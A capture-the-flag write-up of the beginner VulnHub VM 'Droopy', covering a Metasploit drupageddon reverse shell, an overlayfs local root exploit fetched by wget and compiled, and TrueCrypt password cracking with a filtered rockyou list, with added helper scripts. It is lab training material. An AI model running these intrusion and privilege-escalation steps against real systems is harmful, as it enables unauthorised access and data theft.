CTF challenge @ vulnhub.com
Welcome to Droopy. This is a beginner’s boot2root/CTF VM.
The VM is set to grab a DHCP lease on boot.
There’s 2 hints I would offer you:
1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.
It’s a beginner’s boot2root. So let’s see how fast I can get the final flag with this CTF.
As always, let's find out which ports are open for business.
nmap -A -sV -T4 -p- 192.168.56.102
Port 80 is open, and a quick look shows that robots.txt lists a number of directories.
The site runs on Drupal, a Content Management System (CMS).
Let's scan the site with 'droopescan'. This program isn't standard in Kali, and apt-get install droopescan won't get it for you; use pip install droopescan instead.
After checking exploit-db I saw that there were a lot of exploits to choose from. I know there are good, working exploits I can run myself as a Python script that will grant me administrator access, but that way I also have to change the site's settings by hand before I can upload a PHP script (my favourite is the one from pentestmonkey) and run it by visiting the page. That's why I chose the exploit offered in Metasploit (drupageddon) and got a reverse shell the easy way (time's a-wasting :)).
set RHOST 192.168.56.2
set LHOST 192.168.56.102
RHOST is the Drupal target and LHOST the address the reverse shell connects back to. Note that the VM takes a DHCP lease, so its address can differ between sessions (it does not match the address scanned with nmap above); set RHOST to whatever the VM currently holds.
And I'm in. Time for a proper shell, and to see what the machine is running.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@droopy:/etc$ cat /etc/*-release
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
VERSION="14.04.1 LTS, Trusty Tahr"
PRETTY_NAME="Ubuntu 14.04.1 LTS"
It seems the machine runs Ubuntu 14.04. I know this version has a local root exploit against the overlayfs file system, but to use it I need gcc and wget on the target; a quick check shows both are at my disposal. I copied the source of the 'overlayfs' Local Root Exploit (https://www.exploit-db.com/exploits/39166/) and now it's time to get it over to the other machine. Whether a kernel exploit applies is decided by the running kernel (uname -r) and architecture, not by the release string in /etc/*-release, so that is the number to compare against the exploit's stated range before compiling.
--2016-08-01 23:52:16-- http://192.168.56.102/overlayfs.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: 'overlayfs.c'
100%[======================================>] 4,968 --.-K/s in 0s
2016-08-01 23:52:17 (198 MB/s) - 'overlayfs.c' saved [4968/4968]
www-data@droopy:/tmp$ gcc overlayfs.c -o overlayfs
www-data@droopy:/tmp$ chmod 777 overlayfs
(gcc already marks its output executable, so the chmod is not needed; 777 additionally makes the binary world-writable in /tmp.) Running the compiled binary prints:
child threads done
creating shared library
After looking around the system I noticed that there was no flag.txt in the root directory, but there was a TrueCrypt container named dave.tc. As the hint said, you need the rockyou wordlist.
Time to get cracking. I downloaded the TrueCrypt file to my own machine with meterpreter for a faster cracking attempt.
truecrack -t dave.tc -w /usr/share/wordlists/rockyou.txt
This is going to take some time, so in the meantime I'm going to explore the system further and see what else can be found.
Looks like there is just one user, 'gsuser'. Nothing really in the home directory. I found a mail in /var/www-mail.
I already found the encrypted file and truecrack is running as we speak, but there are some things in this mail that could speed truecrack up: a mention of an academy and of a song by The Jam. Let's start with academy first.
grep -i "academy" rockyou.txt > newlist.txt
(With the original pattern "*.academy.*" grep treats the leading asterisk as a literal character, so only entries containing a literal '*' would match; a plain case-insensitive substring match is what is wanted here.) That gives a much smaller list of only 240 words. Let's try it with truecrack. Because I don't know which hash was used for the key derivation (TrueCrypt derives the header key with PBKDF2 over RIPEMD-160, SHA-512 or Whirlpool, and the header does not say which), I start with truecrack's default option, ripemd160, then sha512 and finally whirlpool.
truecrack -t dave.tc -w newlist.txt -k ripemd160
truecrack -t dave.tc -w newlist.txt -k sha512
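The hint-driven wordlist reduction above is worth turning into a repeatable step. This shell snippet is an added example, not the author's code: it filters a wordlist by any number of hint words as fixed strings, case-insensitively and deduplicated, and then runs truecrack once per key-derivation hash, since a failed run with one hash says nothing about the other two. The volume name and the hint word are the ones from this writeup; truecrack must be installed for the second function to do anything.

```sh
#!/bin/sh
# Added example: hint-filtered wordlist plus one truecrack run per key-derivation hash.
# Not from the original writeup. crack_all assumes truecrack is installed.

# hint_filter WORDLIST HINT [HINT...]
# Print wordlist entries containing any hint (fixed strings, case-insensitive), deduplicated.
hint_filter() {
    wordlist=$1
    shift
    # Rotate the remaining args into "-e HINT" pairs so no hint is ever parsed as a regex.
    for h in "$@"; do
        shift
        set -- "$@" -e "$h"
    done
    # -a: rockyou contains non-UTF-8 bytes that would otherwise make grep report "binary file".
    grep -a -i -F "$@" "$wordlist" | LC_ALL=C sort -u
}

# crack_all VOLUME WORDLIST
# TrueCrypt derives the header key with PBKDF2 over RIPEMD-160, SHA-512 or Whirlpool and the
# header carries no marker of which, so all three must be tried before giving up on a list.
crack_all() {
    volume=$1
    list=$2
    for hash in ripemd160 sha512 whirlpool; do
        echo "== truecrack with -k $hash =="
        truecrack -t "$volume" -w "$list" -k "$hash"
    done
}

# Usage (the writeup's command line, generalised to several hints):
#   hint_filter /usr/share/wordlists/rockyou.txt academy > newlist.txt
#   crack_all dave.tc newlist.txt
if [ "$#" -ge 2 ]; then
    hint_filter "$@"
fi
```

Feeding several hints at once (for instance the academy and the song title from the mail) keeps the list small while covering every clue in one pass over rockyou.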
Mounting and exploring
Nice. Now it's time to mount the file and check what's inside.
For mounting the TrueCrypt file I'll be using VeraCrypt. VeraCrypt opens legacy TrueCrypt volumes when 'TrueCrypt Mode' is ticked in the mount dialog; that compatibility mode was dropped in the 1.26 release series, so with a current VeraCrypt an older build (or cryptsetup's tcrypt support on Linux) is needed.
The final flag
Looks like the flag is inside a hidden directory.
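For readers on Linux without VeraCrypt, this added example (not the author's) opens the container with cryptsetup, which handles TrueCrypt volumes natively and works out the PBKDF2 hash and cipher chain itself, mounts it read-only, and lists every path with a dot-prefixed component so a flag inside a hidden directory shows up without walking the tree by hand. It assumes the container is dave.tc, that the recovered password is typed at the prompt, and that sudo is available for the device-mapper and mount steps.

```sh
#!/bin/sh
# Added example: open a TrueCrypt container with cryptsetup and list dot-named paths in it.
# Not from the original writeup. Assumes sudo for the device-mapper and mount steps.

# open_tc VOLUME NAME: map the container as /dev/mapper/NAME and mount it read-only.
# The tcrypt type detects the key-derivation hash and cipher chain itself, so nothing
# learned from truecrack's -k choice needs to be repeated here.
open_tc() {
    volume=$1
    name=$2
    sudo cryptsetup open --type tcrypt "$volume" "$name"   # prompts for the passphrase
    sudo mkdir -p "/mnt/$name"
    sudo mount -o ro "/dev/mapper/$name" "/mnt/$name"       # ro: never modify the evidence
}

# close_tc NAME: undo open_tc.
close_tc() {
    sudo umount "/mnt/$1"
    sudo cryptsetup close "$1"
}

# list_hidden DIR: print every path under DIR, relative to DIR, that has a component
# starting with a dot, so files inside hidden directories appear as well as the directories.
# Paths are made relative before filtering so a dot in DIR's own path does not match everything.
list_hidden() {
    dir=${1%/}
    find "$dir" -mindepth 1 | sed "s|^$dir/||" | grep -e '^\.' -e '/\.' | LC_ALL=C sort
}

# Usage:
#   open_tc dave.tc dave && list_hidden /mnt/dave
#   close_tc dave
```

Mounting read-only is a habit worth keeping even on a CTF box: it prevents the mounted filesystem from updating access times or journals inside the container you just spent hours cracking.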
Alright. Nice challenge, from which I've learned a few new tricks.
Timer stopped at 4 hours, mostly thanks to the TrueCrypt file.